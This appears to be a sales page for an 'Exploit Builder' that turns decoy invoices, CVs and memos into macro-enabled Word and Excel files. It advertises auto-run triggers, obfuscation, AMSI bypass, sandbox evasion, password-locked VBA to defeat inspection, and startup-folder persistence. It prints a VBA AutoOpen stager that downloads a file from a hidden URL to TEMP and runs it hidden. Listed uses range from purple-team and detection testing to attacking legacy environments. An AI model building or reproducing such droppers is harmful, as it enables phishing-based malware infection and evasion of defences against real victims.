A macro-enabled Office document (.docm for Word, .xlsm for Excel) is a ZIP-based Office Open XML container with an extra vbaProject.bin stream holding compiled VBA. When the user enables content, Office's VBA engine resolves auto-trigger handlers (AutoOpen, Document_Open, Workbook_Open, Auto_Open) and runs them.
Exploit Builder injects a hardened, obfuscated VBA module into authentic-looking template documents, applies a VBA project password to defeat casual inspection, and outputs a deliverable file ready for distribution.
vbaProject.bin Dir-stream protectedEmbedded payload (Base64-chunked) or remote URL. Builder picks strategy by size.
Choose decoy template: invoice, CV, financial report, internal memo. Builder bundles realistic visual content.
Trigger (AutoOpen / Document_Open / event-based), AMSI bypass, sandbox checks, password.
Output is a .docm or .xlsm with VBA project password applied. Ready for delivery.
Builder writes a fully spec-compliant OOXML ZIP with [Content_Types].xml, word/document.xml/xl/workbook.xml, and a properly serialized vbaProject.bin CFB stream.
Sets the DPB protection in the PROJECT/dir streams of the CFB. Defeats casual VBA-editor inspection and most tooling that doesn't unwrap the password.
Choose: AutoOpen (Word/Excel), Document_Open, Workbook_Open, AutoExec, or event-driven (Application_DocumentBeforeClose for delayed trigger).
Optional AMSI provider hook patching for on-host detonation testing. Used solely in lab/research scenarios — disabled by default.
Per-build XOR/array obfuscation, indirect COM resolution (CallByName), JIT decryption of constants, comment/whitespace polymorphism.
Authentic-looking visual content (invoice line items, CV body, balance sheet) so the document looks legitimate when the user reviews it post-enable.
Sub AutoOpen() Dim u As String, t As String u = Dec("a4..f8", k) ' decrypt URL t = Environ("TEMP") & "\u.tmp" With CreateObject("MSXML2.XMLHTTP.6.0") .Open "GET", u, False: .Send Set s = CreateObject("ADODB.Stream") s.Type = 1: s.Open: s.Write .responseBody s.SaveToFile t, 2 End With Shell t, vbHide End Sub
| Output Formats | .docm (Word) · .xlsm (Excel) |
|---|---|
| Office Compatibility | Office 2010 / 2013 / 2016 / 2019 / 2021 / Microsoft 365 |
| Trigger Handlers | AutoOpen · Document_Open · Workbook_Open · AutoExec · Event-driven |
| VBA Protection | Project password (DPB) — locks VBA editor inspection |
| Delivery Mode | URL stager (HTTPS via XMLHTTP) · Local embed (Base64-chunked inside the VBA module) |
| Obfuscation | String XOR · Array dispatch · CallByName indirection · Polymorphic layout |
| Decoy Templates | Invoice · CV · Financial report · Internal memo · Custom upload |
| Anti-Analysis | Cursor activity · Recent docs · Hostname filter · Sleep skewing |
| Persistence | Optional Word/Excel STARTUP folder drop |
Authorized internal awareness campaigns where the lure is an invoice/CV/memo — measures click + enable-content rates.
Generate corpus to validate Sigma/YARA rules over vbaProject.bin, OOXML structure, and Office child-process telemetry.
Feed varied macro samples to detonation environments to measure VBA emulator coverage and AMSI integration.
Demonstrate the danger of "Enable Content" in a controlled environment with measurable outcomes.
Use against legacy environments where Office macros are still permitted and the Mark-of-the-Web protections are weak.
Reproduce TTPs from MuddyWater, Kimsuky, FIN7, TA505 macro campaigns for purple-team validation.
All tiers include unlimited builds for both Word and Excel, every decoy template, full VBA-password protection, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
